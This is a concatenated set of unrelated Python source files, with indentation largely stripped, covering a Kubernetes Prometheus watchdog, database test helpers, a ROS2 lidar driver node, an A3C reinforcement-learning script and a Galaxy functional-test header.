sock.connect(server[-1].sock.getsockname())
sock.close()
server[-1].sock.close()
# TODO: implement that flag without global keyword
global running
running = False
def has_message(txt):
"""
Ask the server if a specific message has arrived.
Non-matching Messages are put back into the queue
:param txt: message to look for
:return: True or False
"""
if not running:
return False
if msgqueue.empty():
return False
msg = msgqueue.get()
if txt in msg:
return True
    else:
        msgqueue.put(msg)
        return False
def process_queue():
""""simulate to perform some work (for testing)"""
while True:
if msgqueue.empty():
logging.debug("empty queue")
else:
msg = msgqueue.get()
msgqueue.task_done()
logging.info("tcp-msg: %s" % str(msg))
if "exit" in msg:
break
time.sleep(1)
logging.info("finished")
if __name__ == "__main__":
PORT = input("Port? ")
listen_for_connections(PORT)
process_queue()
|
watchdog.py
|
#!/usr/bin/python
# Copyright (c) Microsoft Corporation
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import argparse
import urllib.parse
import os
import json
import sys
import requests
import logging
import time
import threading
import signal
import faulthandler
import gc
import paramiko
import yaml
import prometheus_client
from prometheus_client import Counter, Summary, Histogram
from prometheus_client.core import GaugeMetricFamily, CounterMetricFamily, Summary, REGISTRY
from prometheus_client.twisted import MetricsResource
from twisted.web.server import Site
from twisted.web.resource import Resource
from twisted.internet import reactor
logger = logging.getLogger(__name__)
##### watchdog will generate the following metrics
# Document about these metrics is in `prometheus/doc/watchdog-metrics.md`
error_counter = Counter("process_error_log_total", "total count of error log", ["type"])
api_healthz_histogram = Histogram("k8s_api_healthz_resp_latency_seconds",
"Response latency for requesting k8s api healthz (seconds)")
# use `histogram_quantile(0.95, sum(rate(k8s_etcd_resp_latency_seconds_bucket[5m])) by (le))`
# to get the 95th percentile latency over the past 5 minutes.
etcd_healthz_histogram = Histogram("k8s_etcd_resp_latency_seconds",
"Response latency for requesting etcd healthz (seconds)")
list_pods_histogram = Histogram("k8s_api_list_pods_latency_seconds",
"Response latency for list pods from k8s api (seconds)")
list_nodes_histogram = Histogram("k8s_api_list_nodes_latency_seconds",
"Response latency for list nodes from k8s api (seconds)")
def gen_pai_pod_gauge():
return GaugeMetricFamily("pai_pod_count", "count of pai pod",
labels=["service_name", "name", "phase", "host_ip",
"initialized", "pod_scheduled", "ready"])
def gen_pai_container_gauge():
return GaugeMetricFamily("pai_container_count", "count of container pod",
labels=["service_name", "pod_name", "name", "state", "host_ip", "ready"])
def gen_pai_node_gauge():
return GaugeMetricFamily("pai_node_count", "count of pai node",
labels=["name", "disk_pressure", "memory_pressure", "out_of_disk", "ready"])
def gen_k8s_component_gauge():
return GaugeMetricFamily("k8s_component_count", "count of k8s component",
labels=["service_name", "error", "host_ip"])
##### watchdog will generate the metrics above
class AtomicRef(object):
""" a thread safe way to store and get object, should not modify data get from this ref """
def __init__(self):
self.data = None
self.lock = threading.RLock()
def get_and_set(self, new_data):
data = None
with self.lock:
data, self.data = self.data, new_data
return data
def get(self):
with self.lock:
return self.data
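
# --- Illustrative sketch (editor's addition, not part of the original module) ---
# How AtomicRef is used further below: the main loop builds a fresh list of gauges on
# every iteration and swaps it in with get_and_set(), while the prometheus collector
# only ever reads the latest snapshot with get().
def _atomic_ref_demo():
    ref = AtomicRef()
    previous = ref.get_and_set(["gauge-snapshot-1"])  # returns None on the first swap
    latest = ref.get()  # ["gauge-snapshot-1"]
    return previous, latest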
class CustomCollector(object):
def __init__(self, atomic_ref):
self.atomic_ref = atomic_ref
def collect(self):
data = self.atomic_ref.get()
if data is not None:
for datum in data:
yield datum
else:
# https://stackoverflow.com/a/6266586
# yield nothing
return
yield
def catch_exception(fn, msg, default, *args, **kwargs):
""" wrap fn call with try catch, makes watchdog more robust """
try:
return fn(*args, **kwargs)
except Exception as e:
error_counter.labels(type="parse").inc()
logger.exception(msg)
return default
def parse_pod_item(pai_pod_gauge, pai_container_gauge, pod):
""" add metrics to pai_pod_gauge or pai_container_gauge if successfully paesed pod.
Because we are parsing json outputed by k8s, its format is subjected to change,
we should test if field exists before accessing it to avoid KeyError """
pod_name = pod["metadata"]["name"]
labels = pod["metadata"].get("labels")
if labels is None or "app" not in list(labels.keys()):
logger.warning("unkown pod %s", pod["metadata"]["name"])
return None
service_name = labels["app"] # get pai service name from label
status = pod["status"]
if status.get("phase") is not None:
phase = status["phase"].lower()
else:
phase = "unknown"
host_ip = "unscheduled" # can not specify None here, None will cause None exception
if status.get("hostIP") is not None:
host_ip = status["hostIP"]
initialized = pod_scheduled = ready = "unknown"
conditions = status.get("conditions")
if conditions is not None:
for cond in conditions:
cond_t = cond["type"] # Initialized|Ready|PodScheduled
cond_status = cond["status"].lower()
if cond_t == "Initialized":
initialized = cond_status
elif cond_t == "PodScheduled":
pod_scheduled = cond_status
elif cond_t == "Ready":
ready = cond_status
else:
error_counter.labels(type="unknown_pod_cond").inc()
logger.error("unexpected condition %s in pod %s", cond_t, pod_name)
pai_pod_gauge.add_metric([service_name, pod_name, phase, host_ip,
initialized, pod_scheduled, ready], 1)
# generate pai_containers
if status.get("containerStatuses") is not None:
container_statuses = status["containerStatuses"]
for container_status in container_statuses:
container_name = container_status["name"]
ready = False
if container_status.get("ready") is not None:
ready = container_status["ready"]
container_state = None
if container_status.get("state") is not None:
state = container_status["state"]
if len(state) != 1:
error_counter.labels(type="unexpected_container_state").inc()
logger.error("unexpected state %s in container %s",
json.dumps(state), container_name)
else:
container_state = list(state.keys())[0].lower()
pai_container_gauge.add_metric([service_name, pod_name, container_name,
container_state, host_ip, str(ready).lower()], 1)
return pai_pod_gauge, pai_container_gauge
def process_pods_status(pai_pod_gauge, pai_container_gauge, podsJsonObject):
def _map_fn(item):
return catch_exception(parse_pod_item,
"catch exception when parsing pod item",
None,
pai_pod_gauge, pai_container_gauge, item)
list(map(_map_fn, podsJsonObject["items"]))
def collect_healthz(gauge, histogram, service_name, address, port, url):
with histogram.time():
error = "ok"
try:
error = requests.get("http://{}:{}{}".format(address, port, url)).text
except Exception as e:
error_counter.labels(type="healthz").inc()
error = str(e)
logger.exception("requesting %s:%d%s failed", address, port, url)
gauge.add_metric([service_name, error, address], 1)
def collect_k8s_component(k8s_gauge, api_server_ip, api_server_port):
collect_healthz(k8s_gauge, api_healthz_histogram,
"k8s_api_server", api_server_ip, api_server_port, "/healthz")
collect_healthz(k8s_gauge, etcd_healthz_histogram,
"k8s_etcd", api_server_ip, api_server_port, "/healthz/etcd")
def parse_node_item(pai_node_gauge, node):
name = node["metadata"]["name"]
disk_pressure = memory_pressure = out_of_disk = ready = "unknown"
if node.get("status") is not None:
status = node["status"]
if status.get("conditions") is not None:
conditions = status["conditions"]
for cond in conditions:
cond_t = cond["type"]
status = cond["status"].lower()
if cond_t == "DiskPressure":
disk_pressure = status
elif cond_t == "MemoryPressure":
memory_pressure = status
elif cond_t == "OutOfDisk":
out_of_disk = status
elif cond_t == "Ready":
ready = status
else:
error_counter.labels(type="unknown_node_cond").inc()
logger.error("unexpected condition %s in node %s", cond_t, name)
else:
logger.warning("unexpected structure of node %s: %s", name, json.dumps(node))
pai_node_gauge.add_metric([name, disk_pressure, memory_pressure, out_of_disk, ready], 1)
return pai_node_gauge
def process_nodes_status(pai_node_gauge, nodesJsonObject):
def _map_fn(item):
return catch_exception(parse_node_item,
"catch exception when parsing node item",
None,
pai_node_gauge, item)
list(map(_map_fn, nodesJsonObject["items"]))
def load_machine_list(configFilePath):
with open(configFilePath, "r") as f:
return yaml.load(f)["hosts"]
def request_with_histogram(url, histogram):
with histogram.time():
return requests.get(url).json()
def try_remove_old_prom_file(path):
""" try to remove old prom file, since old prom file are exposed by node-exporter,
if we do not remove, node-exporter will still expose old metrics """
if os.path.isfile(path):
try:
os.unlink(path)
except Exception as e:
log.warning("can not remove old prom file %s", path)
def register_stack_trace_dump():
faulthandler.register(signal.SIGTRAP, all_threads=True, chain=False)
# https://github.com/prometheus/client_python/issues/322#issuecomment-428189291
def burninate_gc_collector():
for callback in gc.callbacks[:]:
if callback.__qualname__.startswith("GCCollector."):
gc.callbacks.remove(callback)
for name, collector in list(prometheus_client.REGISTRY._names_to_collectors.items()):
if name.startswith("python_gc_"):
try:
prometheus_client.REGISTRY.unregister(collector)
except KeyError: # probably gone already
pass
class HealthResource(Resource):
def render_GET(self, request):
request.setHeader("Content-Type", "text/html; charset=utf-8")
return "<html>Ok</html>".encode("utf-8")
def main(args):
register_stack_trace_dump()
burninate_gc_collector()
logDir = args.log
try_remove_old_prom_file(logDir + "/watchdog.prom")
address = args.k8s_api
parse_result = urllib.parse.urlparse(address)
api_server_scheme = parse_result.scheme
api_server_ip = parse_result.hostname
api_server_port = parse_result.port or 80
list_pods_url = "{}/api/v1/namespaces/default/pods/".format(address)
list_nodes_url = "{}/api/v1/nodes/".format(address)
atomic_ref = AtomicRef()
REGISTRY.register(CustomCollector(atomic_ref))
root = Resource()
root.putChild(b"metrics", MetricsResource())
root.putChild(b"healthz", HealthResource())
factory = Site(root)
reactor.listenTCP(int(args.port), factory)
t = threading.Thread(target=reactor.run, name="twisted")
t.daemon = True
t.start()
while True:
        # these gauges are regenerated on each iteration
pai_pod_gauge = gen_pai_pod_gauge()
pai_container_gauge = gen_pai_container_gauge()
pai_node_gauge = gen_pai_node_gauge()
k8s_gauge = gen_k8s_component_gauge()
try:
# 1. check service level status
podsStatus = request_with_histogram(list_pods_url, list_pods_histogram)
process_pods_status(pai_pod_gauge, pai_container_gauge, podsStatus)
# 2. check nodes level status
nodes_status = request_with_histogram(list_nodes_url, list_nodes_histogram)
process_nodes_status(pai_node_gauge, nodes_status)
# 3. check k8s level status
collect_k8s_component(k8s_gauge, api_server_ip, api_server_port)
except Exception as e:
error_counter.labels(type="unknown").inc()
logger.exception("watchdog failed in one iteration")
atomic_ref.get_and_set([pai_pod_gauge, pai_container_gauge, pai_node_gauge,
k8s_gauge])
time.sleep(float(args.interval))
def get_logging_level():
mapping = {
"DEBUG": logging.DEBUG,
"INFO": logging.INFO,
"WARNING": logging.WARNING
}
result = logging.INFO
if os.environ.get("LOGGING_LEVEL") is not None:
level = os.environ["LOGGING_LEVEL"]
result = mapping.get(level.upper())
if result is None:
sys.stderr.write("unknown logging level " + level + ", default to INFO\n")
result = logging.INFO
return result
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("k8s_api", help="kubernetes api uri eg. http://10.151.40.133:8080")
parser.add_argument("--log", "-l", help="log dir to store log", default="/datastorage/prometheus")
parser.add_argument("--interval", "-i", help="interval between two collection", default="30")
parser.add_argument("--port", "-p", help="port to expose metrics", default="9101")
args = parser.parse_args()
logging.basicConfig(format="%(asctime)s - %(levelname)s - %(filename)s:%(lineno)s - %(message)s",
level=get_logging_level())
main(args)
|
helpers.py
|
import multiprocessing
import time
import socket
import logging
import re
from contextlib import contextmanager
from playhouse.test_utils import _QueryLogHandler
from data.database import LogEntryKind, LogEntry3
class assert_action_logged(object):
"""
Specialized assertion for ensuring that a log entry of a particular kind was added under the
context of this call.
"""
def __init__(self, log_kind):
self.log_kind = log_kind
self.existing_count = 0
def _get_log_count(self):
return (
LogEntry3.select().where(LogEntry3.kind == LogEntryKind.get(name=self.log_kind)).count()
)
def __enter__(self):
self.existing_count = self._get_log_count()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_val is None:
updated_count = self._get_log_count()
error_msg = "Missing new log entry of kind %s" % self.log_kind
assert self.existing_count == (updated_count - 1), error_msg
class log_queries(object):
"""Logs all queries that occur under the context."""
def __init__(self, query_filters=None):
self.filters = query_filters
def get_queries(self):
queries = [q.msg[0] for q in self._handler.queries]
if not self.filters:
return queries
filtered_queries = []
for query_filter in self.filters:
filtered_queries.extend([q for q in queries if re.match(query_filter, q)])
return filtered_queries
def __enter__(self):
logger = logging.getLogger("peewee")
self._handler = _QueryLogHandler()
logger.setLevel(logging.DEBUG)
logger.addHandler(self._handler)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
logger = logging.getLogger("peewee")
logger.removeHandler(self._handler)
class check_transitive_modifications(log_queries):
"""Checks for Peewee-generated transition deletion queries and fails if any are found.
These kinds of queries (which use subqueries) can lock massively on MySQL, so we detect
them and fail.
"""
def __init__(self):
filters = [r"^DELETE.+IN \(SELECT.+$", r"^UPDATE.+IN \(SELECT.+$"]
super(check_transitive_modifications, self).__init__(query_filters=filters)
def __exit__(self, exc_type, exc_val, exc_tb):
super(check_transitive_modifications, self).__exit__(exc_type, exc_val, exc_tb)
queries = self.get_queries()
if queries:
raise Exception("Detected transitive deletion or update in queries: %s" % queries)
_LIVESERVER_TIMEOUT = 5
@contextmanager
def liveserver_app(flask_app, port):
"""
Based on https://github.com/jarus/flask-testing/blob/master/flask_testing/utils.py.
Runs the given Flask app as a live web server locally, on the given port, starting it
when called and terminating after the yield.
Usage:
with liveserver_app(flask_app, port):
# Code that makes use of the app.
"""
shared = {}
def _can_ping_server():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(("localhost", port))
except socket.error:
success = False
else:
success = True
finally:
sock.close()
return success
def _spawn_live_server():
worker = lambda app, port: app.run(port=port, use_reloader=False)
shared["process"] = multiprocessing.Process(target=worker, args=(flask_app, port))
shared["process"].start()
start_time = time.time()
while True:
elapsed_time = time.time() - start_time
if elapsed_time > _LIVESERVER_TIMEOUT:
_terminate_live_server()
raise RuntimeError(
"Failed to start the server after %d seconds. " % _LIVESERVER_TIMEOUT
)
if _can_ping_server():
break
def _terminate_live_server():
if shared.get("process"):
shared.get("process").terminate()
shared.pop("process")
try:
_spawn_live_server()
yield
finally:
_terminate_live_server()
|
ydlidar_node.py
|
import time
import threading
import math
import traceback
from sensor_msgs.msg import LaserScan
import rclpy
from rclpy.node import Node
from rcl_interfaces.msg import ParameterDescriptor
from .driver import YDLidar
from .parser import YDLidarScanParser
from .logging_rclpy import *
class YDLidarNode(Node):
def __init__(self):
super().__init__("ydlidar")
self.pub = self.create_publisher(LaserScan, "scan", 10)
self.declare_parameter("device", "/dev/ttyUSB0", ParameterDescriptor(read_only=True))
# The lidar has autobaud so any baud rate is OK
        # Rates higher than 115200 seem to have no effect
self.declare_parameter("baudrate", 115200, ParameterDescriptor(read_only=True))
device = self.get_parameter("device").get_parameter_value().string_value
baudrate = self.get_parameter("baudrate").get_parameter_value().integer_value
self.lidar = YDLidar(device, baudrate)
log_info(f"Device: {device} {baudrate}")
self.parser = YDLidarScanParser()
self.motor_hz = self.lidar.get_motor_hz()
self.declare_parameter("motor_hz", self.motor_hz, ParameterDescriptor(read_only=True))
log_info(f"Motor Hz: {self.motor_hz}")
self.laser_hz = self.lidar.get_laser_hz()
self.declare_parameter("laser_hz", self.laser_hz, ParameterDescriptor(read_only=True))
log_info(f"Laser Hz: {self.laser_hz}")
self.status_interval = 1
self.last_status = time.time()
self.points_received = 0
self.last_end = 0
self.one_msg_per_rev = True
self.saved_outputs = []
self.declare_parameter("msg_frame_id", "map")
self.msg_frame_id = self.get_parameter("msg_frame_id").get_parameter_value().string_value
def update_params(self):
self.msg_frame_id = self.get_parameter("msg_frame_id").get_parameter_value().string_value
def spin_once(self):
if time.time() - self.last_status > self.status_interval:
log_info(f"{self.points_received} points per second")
self.points_received = 0
self.last_status = time.time()
input_byte = next(self.lidar.read_byte())
if len(input_byte) != 1:
log_warning("Timeout from serial")
return
if self.parser.state == self.parser.state.FINDING_HEADER:
log_debug3(f"HEAD {input_byte}")
self.parser.run_once(input_byte)
if not self.parser.output_ready():
return
output = self.parser.read_output()
if not self.one_msg_per_rev:
# Send this one output only
self.send_msg(output)
self.update_params()
return
else:
            # Check if it's a new rev
if not self.parser.new_rev:
self.saved_outputs += [output]
return
# See if there is output to send
if len(self.saved_outputs) == 0:
self.parser.new_rev = False
self.saved_outputs = []
return
# Assemble real output
output2 = [None] * 4
output2[0] = self.saved_outputs[0][0]
output2[1] = self.saved_outputs[-1][0]
output2[3] = [x[3] for x in self.saved_outputs]
output2[3] = [x for y in output2[3] for x in y]
log_debug(f"Points per revolution: {len(output2[3])}")
log_debug2(f"Gaps: {[b[0] - a[1] for a, b in zip(self.saved_outputs[:-1], self.saved_outputs[1:])]}")
            # This seems to give more stable scans
output2[2] = sum(o[2] for o in self.saved_outputs) / len(self.saved_outputs)
output2[1] = output2[0] + output2[2] * (len(output2[3]) - 1)
self.send_msg(output2)
# Reset flag
self.parser.new_rev = False
self.saved_outputs = []
self.update_params()
return
def send_msg(self, output):
msg = LaserScan()
msg.header.frame_id = self.msg_frame_id
msg.header.stamp.sec = int(self.parser.packet_start)
self.last_end = output[1]
msg.angle_min = math.radians(output[0])
msg.angle_max = math.radians(output[1])
msg.angle_increment = math.radians(output[2])
msg.time_increment = 1 / self.laser_hz
msg.scan_time = 1 / self.motor_hz
msg.range_min = 0.1
msg.range_max = 16.0
# Output from lidar is in mm but ROS expects m
msg.ranges = [o / 1000 for o in output[3]]
self.points_received += len(msg.ranges)
self.pub.publish(msg)
def node_main(args=None):
rclpy.init(args=args)
logger = rclpy.logging.get_logger("ydlidar")
node = YDLidarNode()
# The serial port saturates at around 4700 Hz
# Faster Hz leads to dropped samples
node.lidar.set_laser_hz(4000)
# Set motor Hz to as high as possible
node.lidar.set_motor_hz(10)
rclpy_spin_thread = threading.Thread(target=rclpy.spin, args=(node,))
rclpy_spin_thread.start()
with node.lidar:
while rclpy.ok():
node.spin_once()
node.destroy_node()
rclpy.shutdown()
# main() is called directly by ROS2
def main(args=None):
try:
node_main(args=args)
except:
traceback.print_exc()
log_info("Shutting down")
rclpy.shutdown()
if __name__ == "__main__":
main()
|
a_pg.py
|
import multiprocessing
import threading
import tensorflow as tf
import numpy as np
import gym
import os
import shutil
import matplotlib.pyplot as plt
import gym_sandbox
import multiprocessing
import time
GAME = 'police-killall-trigger-3dgrid-v0'
OUTPUT_GRAPH = True
LOG_DIR = './log'
N_WORKERS = multiprocessing.cpu_count()
MAX_GLOBAL_EP = 300000
GLOBAL_NET_SCOPE = 'Global_Net'
UPDATE_GLOBAL_ITER = 20
GAMMA = 0.9
ENTROPY_BETA = 0.01
LR_A = 0.001 # learning rate for actor
LR_C = 0.001 # learning rate for critic
GLOBAL_RUNNING_R = []
GLOBAL_EP = 0
MIN_P = 1e-6
RUN_MODE = "training" # execution
env = gym.make(GAME)
_s = env.reset()
N_S = list(_s.shape) #
N_A = env.action_space.n
WIDTH = _s.shape[0]
class ACNet(object):
global_step = tf.Variable(0, trainable=False, name="step")
def __init__(self, scope, globalAC=None):
self.scope = scope
if scope == GLOBAL_NET_SCOPE: # get global network
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None]+N_S, 'S')
self._build_net()
self.a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
#self.c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
else: # local net, calculate losses
with tf.variable_scope(scope):
#self.global_step = tf.Variable(0, trainable=False, name="global step")
self.s = tf.placeholder(tf.float32, [None]+N_S, 'S')
self.a_his = tf.placeholder(tf.int32, [None, ], 'A')
self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
self.a_prob = self._build_net()
self.a_prob = (self.a_prob+MIN_P)/(1+N_A*MIN_P)
#td = tf.subtract(self.v_target, self.v, name='TD_error')
# with tf.name_scope('c_loss'):
# self.c_loss = tf.reduce_mean(tf.square(td))
with tf.name_scope('a_loss'):
log_prob = tf.reduce_sum(tf.log(self.a_prob) * tf.one_hot(self.a_his, N_A, dtype=tf.float32),
axis=1, keep_dims=True)
exp_v = log_prob * self.v_target
entropy = -tf.reduce_sum(self.a_prob * tf.log(self.a_prob), axis=1,
keep_dims=True) # encourage exploration
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
self.total_loss = self.a_loss#
if OUTPUT_GRAPH and scope=='W_0':
tf.summary.scalar("actor net loss: ", self.a_loss)
#tf.summary.scalar("critic net loss: ", self.c_loss)
self.merged = tf.summary.merge_all()
with tf.name_scope('local_grad'):
#self.com_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/common')
self.a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
#self.c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
#self.com_grads = tf.gradients(self.total_loss,self.com_params)
self.a_grads = tf.gradients(self.total_loss, self.a_params)
#self.c_grads = tf.gradients(self.total_loss, self.c_params)
with tf.name_scope('sync'):
with tf.name_scope('pull'):
self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, globalAC.a_params)]
#self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, globalAC.c_params)]
#self.pull_com_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.com_params, globalAC.com_params)]
with tf.name_scope('push'):
self.update_a_op = OPT_A.apply_gradients(zip(self.a_grads, globalAC.a_params), ACNet.global_step)
#self.update_c_op = OPT_A.apply_gradients(zip(self.c_grads, globalAC.c_params))
#self.update_com_op = OPT_A.apply_gradients(zip(self.com_grads,globalAC.com_params))
def _build_net(self):
w_init = tf.random_normal_initializer(0., .1)
with tf.variable_scope('actor'):
conv1 = tf.layers.conv2d(self.s,32,[3,3],[2,2],kernel_initializer=w_init,activation=tf.nn.relu6,name='conv1')
W = int((WIDTH - 3) / 2 + 1)
conv2 = tf.layers.conv2d(conv1,32,[2,2],[1,1],kernel_initializer=w_init,activation=tf.nn.relu6,name='conv2')
W = int((W-2)/1+1)
FLAT = tf.reshape(conv2,[-1,32*W*W])
#with tf.variable_scope('actor'):
f1 = tf.layers.dense(FLAT,200,kernel_initializer=w_init,activation=tf.nn.relu6,name='f1')
a_prob = tf.layers.dense(f1, N_A, tf.nn.softmax, kernel_initializer=w_init, name='ap')
# with tf.variable_scope('critic'):
# f1 = tf.layers.dense(FLAT,100,kernel_initializer=w_init,activation=tf.nn.relu6,name='f1')
# v = tf.layers.dense(f1,1, kernel_initializer=w_init, name='v') # state value
return a_prob
def update_global(self, feed_dict): # run by a local
SESS.run([self.update_a_op], feed_dict) # local grads applies to global net
if self.scope == "W_0":
result, st = SESS.run([self.merged,ACNet.global_step],feed_dict)
WRITER.add_summary(result, st)
def pull_global(self): # run by a local
SESS.run([self.pull_a_params_op])
def choose_action(self, s): # run by a local
prob_weights = SESS.run(self.a_prob, feed_dict={self.s: s[np.newaxis, :]})
action = np.random.choice(range(prob_weights.shape[1]), # first digit is batch size, drop it
p=prob_weights.ravel()) # select action w.r.t the actions prob
return action
class Worker(object):
def __init__(self, name, globalAC):
self.env = gym.make(GAME)
self.env.env.init_params(show_dashboard=name == 'W_0')
self.name = name
self.AC = ACNet(name, globalAC)
def work(self):
global GLOBAL_RUNNING_R, GLOBAL_EP
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while not COORD.should_stop() and GLOBAL_EP < MAX_GLOBAL_EP:
s = self.env.reset()
ep_r = 0
            # Save the training parameters periodically (every 5000 episodes)
if GLOBAL_EP % 5000 == 0 and RUN_MODE == 'training' and self.name == 'W_0':
saver.save(SESS, ".tf-models/model.ckpt", global_step=GLOBAL_EP)
while True:
a = self.AC.choose_action(s)
s_, r, done, info = self.env.step(a)
if self.name == 'W_0':
                    show_interval = (GLOBAL_EP + 1) % 10000 == 0
nice = GLOBAL_RUNNING_R and GLOBAL_RUNNING_R[-1] >= -10
# if show_interval or nice or RUN_MODE=='execution':
# self.env.render()
#
# time.sleep(0.2)
#
# if done:
                    # time.sleep(2) # give it a moment at the end of the episode to observe the result
# print('>>>>', 's:', s, ' s_:', s_, 'action:', a, ' -- reward:', r, ' -- done:', done, )
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append(r)
                # Only perform learning while in training mode
if RUN_MODE == "training" and done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = SESS.run(self.AC.v, {self.AC.s: s_[np.newaxis, :]})[0, 0]
buffer_v_target = []
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.array(buffer_a), np.vstack(
buffer_v_target)
buffer_s = np.reshape(buffer_s,[-1]+N_S)
feed_dict = {
self.AC.s: buffer_s,
self.AC.a_his: buffer_a,
self.AC.v_target: buffer_v_target,
}
self.AC.update_global(feed_dict)
if OUTPUT_GRAPH and self.name =='W_0':
result = SESS.run(self.AC.merged,feed_dict=feed_dict)
global WRITER
WRITER.add_summary(result,GLOBAL_EP)
buffer_s, buffer_a, buffer_r = [], [], []
self.AC.pull_global()
s = s_
total_step += 1
if done:
if len(GLOBAL_RUNNING_R) == 0: # record running episode reward
GLOBAL_RUNNING_R.append(ep_r)
else:
GLOBAL_RUNNING_R.append(0.99 * GLOBAL_RUNNING_R[-1] + 0.01 * ep_r)
print(
self.name,
"Ep:", GLOBAL_EP,
"| Ep_r: %i" % GLOBAL_RUNNING_R[-1],
)
GLOBAL_EP += 1
break
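
# --- Illustrative sketch (editor's addition, not part of the training graph) ---
# The v_target computation used in Worker.work() above, written standalone: rewards are
# accumulated backwards with discount GAMMA, starting from the bootstrap value v_s_
# (0 at a terminal state).
def discounted_targets(rewards, v_s_, gamma=GAMMA):
    targets = []
    for r in reversed(rewards):
        v_s_ = r + gamma * v_s_
        targets.append(v_s_)
    targets.reverse()
    return targets

# Example: discounted_targets([1.0, 0.0, 1.0], v_s_=0.0, gamma=0.9) -> [1.81, 0.9, 1.0]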
SESS = tf.Session()
with tf.device("/cpu:0"):
OPT_A = tf.train.RMSPropOptimizer(LR_A, name='RMSPropA')
# OPT_C = tf.train.RMSPropOptimizer(LR_C, name='RMSPropC')
GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE) # we only need its params
workers = []
# Create worker
for i in range(N_WORKERS):
i_name = 'W_%i' % i # worker name
workers.append(Worker(i_name, GLOBAL_AC))
COORD = tf.train.Coordinator()
saver = tf.train.Saver()
SESS.run(tf.global_variables_initializer())
# Load the previously trained parameters first
# saver.restore(SESS, 'models-ma-balls/a3c-1thread-1v1-dynamic-29900')
if OUTPUT_GRAPH:
if os.path.exists(LOG_DIR):
shutil.rmtree(LOG_DIR)
WRITER = tf.summary.FileWriter(LOG_DIR, SESS.graph)
worker_threads = []
for worker in workers:
job = lambda: worker.work()
t = threading.Thread(target=job)
t.start()
worker_threads.append(t)
COORD.join(worker_threads)
|
functional_tests.py
|
#!/usr/bin/env python
"""
This script cannot be run directly, because it needs to have test/functional/test_toolbox.py in sys.argv in
order to run functional tests on repository tools after installation. The install_and_test_tool_shed_repositories.sh
will execute this script with the appropriate parameters.
"""
import os
import sys
# Assume we are run from the galaxy root directory, add lib to the python path
cwd = os.getcwd()
sys.path.append( cwd )
new_path = [ os.path.join( cwd, "scripts" ),
os.path.join( cwd, "lib" ),
os.path.join( cwd, 'test' ),
os.path.join( cwd, 'scripts', 'api' ) ]
new_path.extend( sys.path )
sys.path = new_path
from galaxy import eggs
eggs.require( "nose" )
eggs.require( "Paste" )
eggs.require( 'mercurial' )
# This should not be required, but it is under certain conditions thanks to this bug:
# http://code.google.com/p/python-nose/issues/detail?id=284
eggs.require( "pysqlite" )
import httplib
import install_and_test_tool_shed_repositories.base.test_db_util as test_db_util
import install_and_test_tool_shed_repositories.functional.test_install_repositories as test_install_repositories
import logging
import nose
import random
import re
import shutil
import socket
import tempfile
import time
import threading
import install_and_test_tool_shed_repositories.base.util as install_and_test_base_util
from base.tool_shed_util import parse_tool_panel_config
from galaxy.app import UniverseApplication
from galaxy.util import asbool
from galaxy.util import unicodify
from galaxy.web import buildapp
from functional_tests import generate_config_file
from nose.plugins import Plugin
from paste import httpserver
from functional import database_contexts
log = logging.getLogger( 'install_and_test_tool_dependency_definitions' )
assert sys.version_info[ :2 ] >= ( 2, 6 )
test_home_directory = os.path.join( cwd, 'test', 'install_and_test_tool_shed_repositories', 'tool_dependency_definitions' )
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the database, new repositories, etc.
galaxy_test_tmp_dir = os.path.join( test_home_directory, 'tmp' )
# File containing information about problematic repositories to exclude from test runs.
exclude_list_file = os.path.abspath( os.path.join( test_home_directory, 'exclude.xml' ) )
default_galaxy_locales = 'en'
default_galaxy_test_file_dir = "test-data"
os.environ[ 'GALAXY_INSTALL_TEST_TMP_DIR' ] = galaxy_test_tmp_dir
# Use separate databases for Galaxy and tool shed install info by default,
# set GALAXY_TEST_INSTALL_DB_MERGED to True to revert to merged databases
# behavior.
default_install_db_merged = False
# This script can be run in such a way that no Tool Shed database records should be changed.
if '-info_only' in sys.argv or 'GALAXY_INSTALL_TEST_INFO_ONLY' in os.environ:
can_update_tool_shed = False
else:
can_update_tool_shed = True
